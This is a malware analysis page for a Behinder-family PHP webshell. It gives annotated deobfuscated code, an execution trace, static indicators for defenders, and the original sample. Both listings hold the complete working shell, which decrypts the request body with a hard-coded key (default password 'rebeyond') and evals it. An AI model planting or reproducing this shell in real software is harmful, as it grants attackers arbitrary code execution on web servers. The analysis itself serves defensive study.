PHP Malware Analysis

shell.php

md5: 901c391f79607d8c07d392fa6c7b4c0f


Deobfuscated PHP code

<?php

// Analyst notes.
// This is a PHP webshell: it decrypts the raw request body with a hard-coded key
// and hands the result to eval(). Nothing here authenticates the caller beyond
// knowledge of the key, so anyone holding it runs arbitrary PHP as the web-server
// user. The hard-coded key, the 'k' session entry, the openssl/XOR decoder pair and
// the __invoke-wrapped eval are the distinguishing traits of the "Behinder" (冰蝎)
// shell family.
//
// Static indicators a defender can match on (all taken from the code below):
//   - file_get_contents("php://input") followed by openssl_decrypt(..., "AES128", ...)
//   - a session write of $_SESSION['k'] with a 16-hex-character value
//   - a class whose __invoke() body is eval($p . "")
//   - @error_reporting(0) as the first statement of a file in an upload directory

// Silence every PHP error so a bad payload never yields an error page or log line.
// The leading '@' also suppresses any warning raised by this call itself.
@error_reporting(0);
session_start();
// Hard-coded 16-byte AES key. The author's comment (translated just below) says it is
// the first 16 characters of the 32-character MD5 of the connection password, and that
// the default connection password is "rebeyond" - so this exact value indicates an
// unchanged default deployment.
$key = "e45e329feb5d925b";
// (original comment, translated) This key is the first 16 chars of the 32-char MD5 of
// the connection password; the default connection password is rebeyond.
$_SESSION['k'] = $key;
// Commit and close the session immediately; the key is persisted to the session store
// on every request, which is itself a forensic artifact.
session_write_close();
// Ciphertext is the raw request body, not a named form field, so $_POST-based
// request logging will not capture it.
$post = file_get_contents("php://input");
if (!extension_loaded('openssl')) {
    // Fallback decoder when OpenSSL is absent. $t is unused in this deobfuscated
    // form; in the original it is "base64_"."decode" called through the variable,
    // presumably to avoid naive string matching on the function name.
    $t = "base64_decode";
    $post = base64_decode($post . "");
    // Byte-wise XOR with the key. Precedence matters here: '+' binds tighter than
    // '&', so the key index is ($i + 1) & 15, i.e. key byte (i + 1) mod 16.
    for ($i = 0; $i < strlen($post); $i++) {
        $post[$i] ^= $key[$i + 1 & 15];
    }
} else {
    // AES-128 decryption with the same key and default options, i.e. the ciphertext
    // is expected base64-encoded; no IV argument is passed. NOTE(review): "AES128" is
    // an OpenSSL cipher alias - confirm which mode it resolves to on the target build.
    // On failure this returns false (see the trace on this page), which is not checked.
    $post = openssl_decrypt($post, "AES128", $key);
}
// Plaintext layout is "<func>|<params>". $func is assigned but never read in this
// file; only the second field is used.
$arr = explode('|', $post);
$func = $arr[0];
// If the plaintext has no '|' (empty or undecryptable body) $arr[1] is undefined;
// the notice is hidden by error_reporting(0) and $params becomes NULL, as the
// execution trace on this page shows.
$params = $arr[1];
// The eval is wrapped in an __invoke() method and reached through call_user_func,
// presumably so that neither "eval(" nor a direct call sits next to the decrypted
// input - a recurring pattern in this family.
class C
{
    public function __invoke($p)
    {
        // Executes the decrypted, attacker-supplied PHP in the web server's context.
        eval($p . "");
    }
}
// Entry point; the '@' hides any error from the invocation as well.
@call_user_func(new C(), $params);

Execution traces

data/traces/901c391f79607d8c07d392fa6c7b4c0f_trace-1676247240.5241.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:14:26.421973]
1	0	1	0.000215	393512
1	3	0	0.000333	400136	{main}	1		/var/www/html/uploads/shell.php	0	0
2	4	0	0.000357	400136	error_reporting	0		/var/www/html/uploads/shell.php	2	1	0
2	4	1	0.000378	400176
2	4	R			0
2	5	0	0.000397	400136	session_start	0		/var/www/html/uploads/shell.php	3	0
2	5	1	0.000466	400888
2	5	R			TRUE
1		A						/var/www/html/uploads/shell.php	4	$key = 'e45e329feb5d925b'
1		A						/var/www/html/uploads/shell.php	5	_SESSION['k'] = 'e45e329feb5d925b'
2	6	0	0.000525	401208	session_write_close	0		/var/www/html/uploads/shell.php	6	0
2	6	1	0.000558	401104
2	6	R			TRUE
2	7	0	0.000577	401104	file_get_contents	0		/var/www/html/uploads/shell.php	7	1	'php://input'
2	7	1	0.000604	401840
2	7	R			''
1		A						/var/www/html/uploads/shell.php	7	$post = ''
2	8	0	0.000638	401800	extension_loaded	0		/var/www/html/uploads/shell.php	8	1	'openssl'
2	8	1	0.000658	401840
2	8	R			TRUE
2	9	0	0.000676	401800	openssl_decrypt	0		/var/www/html/uploads/shell.php	19	3	''	'AES128'	'e45e329feb5d925b'
2	9	1	0.000716	401904
2	9	R			FALSE
1		A						/var/www/html/uploads/shell.php	19	$post = FALSE
2	10	0	0.000750	401800	explode	0		/var/www/html/uploads/shell.php	21	2	'|'	FALSE
2	10	1	0.000770	402248
2	10	R			[0 => '']
1		A						/var/www/html/uploads/shell.php	21	$arr = [0 => '']
1		A						/var/www/html/uploads/shell.php	22	$func = ''
1		A						/var/www/html/uploads/shell.php	23	$params = NULL
2	12	0	0.000854	402216	C->__invoke	1		/var/www/html/uploads/shell.php	25	1	NULL
2	12	1	0.000875	402248
1	3	1	0.000886	402208
			0.000917	316664
TRACE END   [2023-02-12 22:14:26.422715]


Generated HTML code

<html><head></head><body></body></html>

Original PHP code

<?php
// Original, unformatted sample; the deobfuscated listing above is the same program.
// Behaviour: decrypt the raw request body with the hard-coded key below and eval()
// the result. Every PHP error is silenced first, so failures leave no error output.
@error_reporting(0);
session_start();
    $key="e45e329feb5d925b"; // This key is the first 16 chars of the 32-char MD5 of the connection password; the default connection password is rebeyond
	$_SESSION['k']=$key;
	session_write_close();
	$post=file_get_contents("php://input");
	if(!extension_loaded('openssl'))
	{
		// Decoder name built by concatenation and called through a variable,
		// presumably to avoid naive matching on "base64_decode".
		$t="base64_"."decode";
		$post=$t($post."");
		
		for($i=0;$i<strlen($post);$i++) {
    			 $post[$i] = $post[$i]^$key[$i+1&15]; 
    			}
	}
	else
	{
		$post=openssl_decrypt($post, "AES128", $key);
	}
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
	// eval() hidden inside an __invoke() method and reached via call_user_func.
	class C{public function __invoke($p) {eval($p."");}}
    @call_user_func(new C(),$params);
?>